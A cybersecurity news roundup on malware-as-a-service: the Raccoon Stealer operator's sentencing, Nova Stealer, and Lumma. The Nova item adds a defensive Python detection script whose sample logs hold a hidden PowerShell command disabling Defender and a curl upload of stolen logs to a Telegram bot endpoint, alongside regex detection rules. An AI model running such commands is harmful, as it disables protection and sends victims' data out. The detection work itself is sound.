CyberSecurity news

FlagThis - #MaaS

Greg Otto@CyberScoop - 76d



References :
  • Cybernews: An operator of the Raccoon Infostealer malware, who previously faked his own death, was sentenced to 60 months in federal prison.
  • securityonline.info: Zscaler ThreatLabz has identified a new malware family, RiseLoader, which specializes in downloading and executing second-stage payloads.
  • DataBreaches.Net: Ukrainian National Sentenced to Federal Prison in “Raccoon Infostealer” Cybercrime Case
  • malware.news: Ukrainian National Sentenced to Federal Prison in “Raccoon Infostealer” Cybercrime Case
  • www.bleepingcomputer.com: Ukrainian national Mark Sokolovsky was sentenced today to five years in prison for his involvement in the Raccoon Stealer malware cybercrime operation.
  • Threats | CyberScoop: Ukrainian sentenced to five years in jail for work on Raccoon Stealer
  • BleepingComputer: Ukrainian national Mark Sokolovsky was sentenced today to five years in prison for his involvement in the Raccoon Stealer malware cybercrime operation.
  • malware.news: Raccoon Stealer operator jailed
  • Help Net Security: Ukrainian national Mark Sokolovsky was sentenced to 60 months in federal prison for one count of conspiracy to commit computer intrusion. According to court documents, he conspired to operate the Raccoon Infostealer as a malware-as-a-service (MaaS).
  • www.justice.gov: U.S. Department of Justice : Ukrainian national Mark Sokolovsky was sentenced to 60 months in prison for administering the Raccoon Infostealer malware-as-a-service (MaaS) business.
  • securityaffairs.com: SecurityAffairs.com report on Raccoon Infostealer operator.
Classification:
  • HashTags: #RaccoonStealer #Malware #Cybercrime
  • Target: Raccoon Stealer Victims
  • Attacker: Raccoon Stealer Operator
  • Product: Raccoon Stealer
  • Feature: Malware Operation
  • Malware: Raccoon Stealer
  • Type: Legal
  • Severity: Major
@securityonline.info - 27d
Cybersecurity experts are warning of a widespread campaign involving Nova Stealer, a variant of SnakeLogger malware, now being sold as Malware-as-a-Service (MaaS) on underground forums. Priced as low as $50 for a 30-day license, Nova Stealer is designed to steal sensitive information, including credentials, keystrokes, screenshots, and clipboard data, making it an attractive tool for cybercriminals. This affordability and ease of deployment significantly lower the barrier for entry, enabling even novice attackers to launch sophisticated cyberattacks, especially targeting industries such as finance, retail, and IT.

The malware is typically delivered through phishing emails carrying attachments disguised as legitimate documents. Once executed, Nova Stealer uses techniques such as steganography and process hollowing to evade detection, and abuses built-in Windows utilities such as PowerShell to disable Microsoft Defender. Stolen data is exfiltrated over SMTP, FTP, or the Telegram Bot API and can be leveraged for identity theft, financial fraud, and follow-on ransomware attacks. The rise of Nova Stealer highlights the persistent threat that information stealers pose in the cybercrime ecosystem.
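The behaviours described above (a phishing document that launches a script host, PowerShell turning off Defender, and an upload to a Telegram bot endpoint) are all visible in ordinary process-creation telemetry. The following is an added example, not code from BI.ZONE or any of the cited reports: it runs three simple rules over a handful of constructed log lines in an assumed key=value format. The reports say only that PowerShell is used to disable Defender and that Telegram is one exfiltration channel; the Set-MpPreference/Add-MpPreference patterns and the curl-to-Telegram command line are assumptions about how that commonly looks, and every host name, path and bot token below is made up.

```python
"""Three process-creation detections for Nova Stealer-style tradecraft (added example)."""
import re
from dataclasses import dataclass

# Constructed process-creation events in an assumed key=value format
# (not real telemetry and not the log format of any specific product).
SAMPLE_LOGS = [
    # Benign: an admin reads the Defender configuration from an interactive shell.
    r'2025-01-10T09:12:01Z host=WS01 user=alice parent="C:\Windows\explorer.exe" '
    r'image="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" '
    r'cmdline="powershell.exe Get-MpPreference"',
    # Suspicious: Word spawns a hidden PowerShell that turns off real-time protection.
    r'2025-01-10T09:14:33Z host=WS02 user=bob '
    r'parent="C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE" '
    r'image="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" '
    r'cmdline="powershell.exe -nop -w hidden Set-MpPreference -DisableRealtimeMonitoring $true"',
    # Benign: an admin re-enables real-time protection (same cmdlet, opposite value).
    r'2025-01-10T09:20:00Z host=WS01 user=alice parent="C:\Windows\explorer.exe" '
    r'image="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" '
    r'cmdline="powershell.exe Set-MpPreference -DisableRealtimeMonitoring $false"',
    # Suspicious: an archive of harvested data is posted to a Telegram bot endpoint.
    r'2025-01-10T09:15:10Z host=WS03 user=carol parent="C:\Users\carol\AppData\Local\Temp\update.exe" '
    r'image="C:\Windows\System32\curl.exe" '
    r'cmdline="curl.exe -F document=@C:\Users\carol\AppData\Local\Temp\logs.zip '
    r'https://api.telegram.org/bot123456789:AAH_constructed_token/sendDocument?chat_id=42"',
]

# key=value tokens; values may be double-quoted so that paths with spaces survive.
KV_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')

# Defender tampering via PowerShell. Only a disable set to $true/1 (or a new exclusion)
# fires, so re-enabling protection with $false stays quiet. Assumed cmdlets, see lead-in.
DEFENDER_TAMPER_RE = re.compile(
    r'Set-MpPreference\b[^|;]*?-Disable\w+[\s:]+(\$true|1)\b'
    r'|Add-MpPreference\b[^|;]*?-Exclusion(Path|Process|Extension)\b',
    re.IGNORECASE,
)
# Telegram Bot API upload/message endpoints used as an exfiltration channel.
TELEGRAM_EXFIL_RE = re.compile(
    r'api\.telegram\.org/bot\d+:[\w-]+/(sendDocument|sendMessage)\b', re.IGNORECASE)

OFFICE_PARENTS = {'winword.exe', 'excel.exe', 'powerpnt.exe', 'outlook.exe'}
SCRIPT_HOSTS = {'powershell.exe', 'pwsh.exe', 'cmd.exe', 'wscript.exe', 'cscript.exe', 'mshta.exe'}


def parse_event(line: str) -> dict:
    """Turn one key=value line into a dict, stripping quotes from quoted values."""
    return {k: v.strip('"') for k, v in KV_RE.findall(line)}


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace('\\', '/').rsplit('/', 1)[-1].lower()


@dataclass(frozen=True)
class Alert:
    rule: str
    host: str
    detail: str


def evaluate(event: dict) -> list:
    """Apply the three rules to one parsed event and return the alerts it raises."""
    alerts = []
    host = event.get('host', '?')
    parent = basename(event.get('parent', ''))
    image = basename(event.get('image', ''))
    cmdline = event.get('cmdline', '')
    # Phishing document execution: an Office process launching a script host.
    if parent in OFFICE_PARENTS and image in SCRIPT_HOSTS:
        alerts.append(Alert('office_spawns_script_host', host, f'{parent} -> {image}'))
    # Defender disabled or excluded from a PowerShell command line.
    if image in {'powershell.exe', 'pwsh.exe'} and DEFENDER_TAMPER_RE.search(cmdline):
        alerts.append(Alert('defender_tamper', host, cmdline))
    # Any process talking to a Telegram bot send endpoint.
    if TELEGRAM_EXFIL_RE.search(cmdline):
        alerts.append(Alert('telegram_bot_exfil', host, cmdline))
    return alerts


def scan(lines) -> list:
    """Run evaluate() over every log line and flatten the alerts."""
    return [alert for line in lines for alert in evaluate(parse_event(line))]


if __name__ == '__main__':
    for alert in scan(SAMPLE_LOGS):
        print(f'[{alert.rule}] {alert.host}: {alert.detail}')
```

Run as-is, the constructed sample produces three alerts: two for the WS02 event (Office parent plus Defender tampering) and one for the Telegram upload on WS03; the two administrative PowerShell invocations stay silent. In production the `defender_tamper` rule still needs tuning, because administrators and deployment tools do run `Set-MpPreference`, so the parent process and user context should weigh into the verdict. Note what this does not cover: steganography in the loader and process hollowing are not visible in command lines and need memory or image-load telemetry from an EDR.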



References :
  • gbhackers.com: Beware of Nova Stealer Malware Sold for $50 on Hacking Forums
  • securityonline.info: $50 for Your Data: NOVA Stealer Sold as Malware-as-a-Service
  • securityonline.info: The BI.ZONE Threat Intelligence team has reported a significant ongoing campaign distributing the NOVA stealer, a new commercial
  • gbhackers.com: The cybersecurity landscape faces a new challenge with the emergence of Nova Stealer, a malware marketed under the Malware-as-a-Service (MaaS) model.
  • cyberpress.org: Cybercriminals Selling Nova Stealer Malware for $50 on Dark Web
Classification:
  • HashTags: #NovaStealer #Malware #Cybersecurity
  • Target: Individuals and Organizations
  • Attacker: Nova Stealer operators and customers
  • Feature: Malware-as-a-Service
  • Malware: Nova Stealer
  • Type: Malware
  • Severity: Major
@www.malwarebytes.com - 67d
Lumma, an advanced information stealer, has become a dominant force in the cybercrime landscape throughout 2024. Marketed as Malware-as-a-Service (MaaS), it is readily available on Russian-speaking forums and Telegram channels. This malware targets Windows systems, aiming to exfiltrate credentials, cryptocurrency wallet data, browser information, and two-factor authentication details. Lumma employs sophisticated methods such as binary morphing and server-side data decryption to avoid detection. It operates on a subscription basis, with tiered plans offering features such as customizable log management, data filtering, and advanced stealth capabilities, making it accessible to both novice and experienced cybercriminals.

Lumma’s capabilities are extensive and include data exfiltration, regular updates, detailed data logs, and the ability to download additional malware onto compromised systems. It has been observed in multiple campaigns that use phishing, malvertising, and fake software updates as lures. These campaigns have targeted a diverse range of sectors, including manufacturing and transportation, as well as individuals such as gamers, users of cracked software, and cryptocurrency enthusiasts. The developers of Lumma enforce a policy of not targeting Russia, so although the malware is sold on Russian-speaking forums, its victims lie outside Russian-speaking regions.



References :
  • malware.news: Lumma 2024: Dominating the Info-Stealer Market
  • www.infostealers.com: Lumma 2024: Dominating the Info-Stealer Market
  • www.esentire.com: The malware is managed via an easy-to-use interface, making it accessible even to less technically skilled users
Classification:
  • HashTags: #Malware #InfoStealer #MaaS
  • Target: Various Users
  • Product: malware
  • Feature: information stealing
  • Malware: Lumma
  • Type: Malware
  • Severity: Major